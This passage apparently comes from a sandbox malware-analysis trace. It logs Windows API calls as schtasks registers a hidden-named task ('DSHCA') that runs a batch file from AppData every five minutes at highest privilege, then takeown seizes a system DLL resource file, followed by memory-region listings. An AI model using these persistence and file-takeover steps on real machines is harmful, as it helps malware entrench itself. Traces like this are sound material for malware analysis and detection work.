4 [0288.408] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|it|", lpSrch="|F|") returned 0x0 [0288.408] RtlRestoreLastWin32Error () returned 0x490 [0288.408] lstrlenW (lpString="et") returned 2 [0288.408] lstrlenW (lpString="et") returned 2 [0288.408] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|et|") returned 4 [0288.408] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.408] lstrlenW (lpString="|et|") returned 4 [0288.408] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|et|", lpSrch="|F|") returned 0x0 [0288.408] RtlRestoreLastWin32Error () returned 0x490 [0288.408] lstrlenW (lpString="k") returned 1 [0288.408] lstrlenW (lpString="k") returned 1 [0288.408] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|k|") returned 3 [0288.408] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.408] lstrlenW (lpString="|k|") returned 3 [0288.408] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|k|", lpSrch="|F|") returned 0x0 [0288.408] RtlRestoreLastWin32Error () returned 0x490 [0288.408] lstrlenW (lpString="du") returned 2 [0288.408] lstrlenW (lpString="du") returned 2 [0288.408] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.408] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|du|") returned 4 [0288.408] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.408] lstrlenW (lpString="|du|") returned 4 [0288.408] lstrlenW (lpString="|F|") returned 3 [0288.408] StrStrIW (lpFirst="|du|", lpSrch="|F|") returned 0x0 [0288.409] RtlRestoreLastWin32Error () returned 0x490 [0288.409] lstrlenW (lpString="ri") returned 2 [0288.409] lstrlenW (lpString="ri") returned 2 [0288.409] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ri|") returned 4 [0288.409] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.409] lstrlenW (lpString="|ri|") returned 4 [0288.409] lstrlenW (lpString="|F|") returned 3 [0288.409] StrStrIW (lpFirst="|ri|", lpSrch="|F|") returned 0x0 [0288.409] RtlRestoreLastWin32Error () returned 0x490 [0288.409] lstrlenW (lpString="z") returned 1 [0288.409] lstrlenW (lpString="z") returned 1 [0288.409] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|z|") returned 3 [0288.409] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.409] lstrlenW (lpString="|z|") returned 3 [0288.409] lstrlenW (lpString="|F|") returned 3 [0288.409] StrStrIW (lpFirst="|z|", lpSrch="|F|") returned 0x0 [0288.409] RtlRestoreLastWin32Error () returned 0x490 [0288.409] lstrlenW (lpString="f") returned 1 [0288.409] lstrlenW (lpString="f") returned 1 [0288.409] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|f|") returned 3 [0288.409] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|F|") returned 3 [0288.409] lstrlenW (lpString="|f|") returned 3 [0288.409] lstrlenW (lpString="|F|") returned 3 [0288.409] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0288.409] RtlRestoreLastWin32Error () returned 0x0 [0288.409] RtlRestoreLastWin32Error () returned 0x0 [0288.409] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0288.409] lstrlenW (lpString="LIMITED") returned 7 [0288.409] GetThreadLocale () returned 0x409 [0288.409] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0288.409] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.409] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0288.409] lstrlenW (lpString="HIGHEST") returned 7 [0288.409] GetThreadLocale () returned 0x409 [0288.409] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0288.410] lstrlenW (lpString="MINUTE") returned 6 [0288.410] GetThreadLocale () returned 0x409 [0288.410] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="minute", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 2 [0288.410] RtlRestoreLastWin32Error () returned 0x0 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0288.410] lstrlenW (lpString="First") returned 5 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0288.410] lstrlenW (lpString="Second") returned 6 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0288.410] lstrlenW (lpString="Third") returned 5 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0288.410] lstrlenW (lpString="Fourth") returned 6 [0288.410] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.410] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0288.410] lstrlenW (lpString="Last") returned 4 [0288.410] lstrlenW (lpString="5") returned 1 [0288.410] _wtol (_String="5") returned 5 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0288.411] lstrlenW (lpString="First") returned 5 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0288.411] lstrlenW (lpString="Second") returned 6 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0288.411] lstrlenW (lpString="Third") returned 5 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0288.411] lstrlenW (lpString="Fourth") returned 6 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0288.411] lstrlenW (lpString="Last") returned 4 [0288.411] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xcccbc0, cchData=128 | out: lpLCData="0") returned 2 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0288.411] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0288.411] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xcccbc4, cchData=128 | out: lpLCData="0") returned 2 [0288.411] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.411] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0288.411] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0288.411] GetLocalTime (in: lpSystemTime=0xcccda4 | out: lpSystemTime=0xcccda4*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x8, wSecond=0x19, wMilliseconds=0x24)) [0288.411] lstrlenW (lpString="") returned 0 [0288.412] GetLocalTime (in: lpSystemTime=0xccd258 | out: lpSystemTime=0xccd258*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x8, wSecond=0x19, wMilliseconds=0x24)) [0288.412] lstrlenW (lpString="") returned 0 [0288.412] lstrlenW (lpString="") returned 0 [0288.412] lstrlenW (lpString="") returned 0 [0288.412] lstrlenW (lpString="") returned 0 [0288.412] lstrlenW (lpString="5") returned 1 [0288.412] _wtol (_String="5") returned 5 [0288.412] lstrlenW (lpString="") returned 0 [0288.412] lstrlenW (lpString="") returned 0 [0288.412] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0288.506] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0288.564] CoCreateInstance (in: rclsid=0x10826c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x10826d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xccd174 | out: ppv=0xccd174*=0x52b38b0) returned 0x0 [0288.971] TaskScheduler:ITaskService:Connect (This=0x52b38b0, serverName=0xccd124*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xccd134*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xccd144*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xccd154*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0288.975] TaskScheduler:ITaskService:GetFolder (in: This=0x52b38b0, Path=0x0, ppFolder=0xccd23c | out: ppFolder=0xccd23c*=0x52b39e0) returned 0x0 [0288.976] TaskScheduler:ITaskService:NewTask (in: This=0x52b38b0, flags=0x0, ppDefinition=0xccd24c | out: ppDefinition=0xccd24c*=0x52b3a30) returned 0x0 [0288.977] ITaskDefinition:get_Actions (in: This=0x52b3a30, ppActions=0xccd1c0 | out: ppActions=0xccd1c0*=0x52b3a80) returned 0x0 [0288.977] IActionCollection:Create (in: This=0x52b3a80, Type=0, ppAction=0xccd1c4 | out: ppAction=0xccd1c4*=0x52b3ca0) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x49) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x36) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0288.977] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x67) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x4b) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x51) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0288.978] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0288.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.978] StrChrIW (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat", wMatch=0x20) returned 0x0 [0288.978] RtlRestoreLastWin32Error () returned 0x490 [0288.978] IUnknown:Release (This=0x52b3ca0) returned 0x1 [0288.978] IUnknown:Release (This=0x52b3a80) returned 0x1 [0288.978] ITaskDefinition:get_Triggers (in: This=0x52b3a30, ppTriggers=0xcccd90 | out: ppTriggers=0xcccd90*=0x52b3be8) returned 0x0 [0288.978] ITriggerCollection:Create (in: This=0x52b3be8, Type=1, ppTrigger=0xcccda4 | out: ppTrigger=0xcccda4*=0x52b3cf0) returned 0x0 [0288.981] lstrlenW (lpString="5") returned 1 [0288.981] _vsnwprintf (in: _Buffer=0xcccd44, _BufferCount=0xf, _Format="PT%sM", _ArgList=0xcccd38 | out: _Buffer="PT5M") returned 4 [0288.981] ITrigger:get_Repetition (in: This=0x52b3cf0, ppRepeat=0xcccda0 | out: ppRepeat=0xcccda0*=0x52b3d40) returned 0x0 [0288.981] IRepetitionPattern:put_Interval (This=0x52b3d40, Interval="PT5M") returned 0x0 [0288.981] IUnknown:Release (This=0x52b3d40) returned 0x1 [0288.981] _vsnwprintf (in: _Buffer=0xcccd14, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xccccf4 | out: _Buffer="2018-10-03T13:08:00") returned 19 [0288.981] ITrigger:put_StartBoundary (This=0x52b3cf0, StartBoundary="2018-10-03T13:08:00") returned 0x0 [0288.981] lstrlenW (lpString="") returned 0 [0288.981] lstrlenW (lpString="") returned 0 [0288.981] lstrlenW (lpString="") returned 0 [0288.981] lstrlenW (lpString="") returned 0 [0288.981] IUnknown:Release (This=0x52b3cf0) returned 0x1 [0288.981] IUnknown:Release (This=0x52b3be8) returned 0x1 [0288.981] ITaskDefinition:get_Settings (in: This=0x52b3a30, ppSettings=0xccd1cc | out: ppSettings=0xccd1cc*=0x52b3b38) returned 0x0 [0288.981] lstrlenW (lpString="") returned 0 [0288.981] IUnknown:Release (This=0x52b3b38) returned 0x3 [0288.981] GetLocalTime (in: lpSystemTime=0xccd0c0 | out: lpSystemTime=0xccd0c0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x8, wSecond=0x19, wMilliseconds=0x267)) [0288.982] ResolveDelayLoadedAPI () returned 0x74aac5f0 [0288.982] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xccd0d0, nSize=0xccd0b8 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xccd0b8) returned 0x1 [0288.982] ITaskDefinition:get_RegistrationInfo (in: This=0x52b3a30, ppRegistrationInfo=0xccd0bc | out: ppRegistrationInfo=0xccd0bc*=0x52b3ac8) returned 0x0 [0288.982] IRegistrationInfo:put_Author (This=0x52b3ac8, Author="LHNIWSJ\\CIiHmnxMn6Ps") returned 0x0 [0288.982] _vsnwprintf (in: _Buffer=0xccd0d0, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xccd090 | out: _Buffer="2018-10-03T13:08:25") returned 19 [0288.982] IRegistrationInfo:put_Date (This=0x52b3ac8, Date="2018-10-03T13:08:25") returned 0x0 [0288.982] IUnknown:Release (This=0x52b3ac8) returned 0x1 [0288.982] lstrlenW (lpString="") returned 0 [0288.983] ITaskDefinition:get_Principal (in: This=0x52b3a30, ppPrincipal=0xccd254 | out: ppPrincipal=0xccd254*=0x52b3c28) returned 0x0 [0288.983] IPrincipal:put_RunLevel (This=0x52b3c28, RunLevel=1) returned 0x0 [0288.983] IUnknown:Release (This=0x52b3c28) returned 0x1 [0288.983] ITaskFolder:RegisterTaskDefinition (in: This=0x52b39e0, Path="DSHCA", pDefinition=0x52b3a30, flags=6, UserId=0xccd1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xccd1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xccd1d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xccd21c | out: ppTask=0xccd21c*=0x52b21d0) returned 0x0 [0291.962] _memicmp (_Buf1=0xde77a0, _Buf2=0x1082708, _Size=0x7) returned 0 [0291.962] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0xdea818, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0291.962] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0291.962] _vsnwprintf (in: _Buffer=0xccd670, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xccd1e4 | out: _Buffer="SUCCESS: The scheduled task \"DSHCA\" has successfully been created.\n") returned 67 [0291.962] __iob_func () returned 0x77981208 [0291.962] _fileno (_File=0x77981228) returned 1 [0291.962] _errno () returned 0x52b05b0 [0291.962] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.962] _errno () returned 0x52b05b0 [0291.962] GetFileType (hFile=0x3c) returned 0x2 [0291.963] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.963] GetFileType (hFile=0x3c) returned 0x2 [0291.963] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xccd1b8 | out: lpMode=0xccd1b8) returned 1 [0292.792] __iob_func () returned 0x77981208 [0292.792] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.792] lstrlenW (lpString="SUCCESS: The scheduled task \"DSHCA\" has successfully been created.\n") returned 67 [0292.792] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xccd670*, nNumberOfCharsToWrite=0x43, lpNumberOfCharsWritten=0xccd1dc, lpReserved=0x0 | out: lpBuffer=0xccd670*, lpNumberOfCharsWritten=0xccd1dc*=0x43) returned 1 [0292.963] IUnknown:Release (This=0x52b21d0) returned 0x0 [0292.963] TaskScheduler:IUnknown:Release (This=0x52b3a30) returned 0x0 [0292.963] TaskScheduler:IUnknown:Release (This=0x52b39e0) returned 0x0 [0292.963] TaskScheduler:IUnknown:Release (This=0x52b38b0) returned 0x0 [0292.963] lstrlenW (lpString="") returned 0 [0292.963] lstrlenW (lpString="5") returned 1 [0292.963] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="5", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0292.968] exit (_Code=0) Thread: id = 948 os_tid = 0xe70 Process: id = "124" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x68a43000" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xdfc" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8738 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 8739 start_va = 0x3e0000 end_va = 0x43dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 8740 start_va = 0x43e0000 end_va = 0x43fffff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 8741 start_va = 0x4400000 end_va = 0x4401fff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 8742 start_va = 0x4410000 end_va = 0x4423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 8743 start_va = 0x4430000 end_va = 0x446ffff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 8744 start_va = 0x4470000 end_va = 0x44affff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 8745 start_va = 0x44b0000 end_va = 0x44b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044b0000" filename = "" Region: id = 8746 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8747 start_va = 0x7f460000 end_va = 0x7f482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f460000" filename = "" Region: id = 8748 start_va = 0x7f485000 end_va = 0x7f485fff entry_point = 0x0 region_type = private name = "private_0x000000007f485000" filename = "" Region: id = 8749 start_va = 0x7f488000 end_va = 0x7f488fff entry_point = 0x0 region_type = private name = "private_0x000000007f488000" filename = "" Region: id = 8750 start_va = 0x7f48d000 end_va = 0x7f48ffff entry_point = 0x0 region_type = private name = "private_0x000000007f48d000" filename = "" Region: id = 8751 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8752 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8753 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8754 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8755 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8756 start_va = 0x44c0000 end_va = 0x44c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 8757 start_va = 0x44d0000 end_va = 0x44d1fff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 8801 start_va = 0x4570000 end_va = 0x457ffff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 8802 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8803 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8804 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: 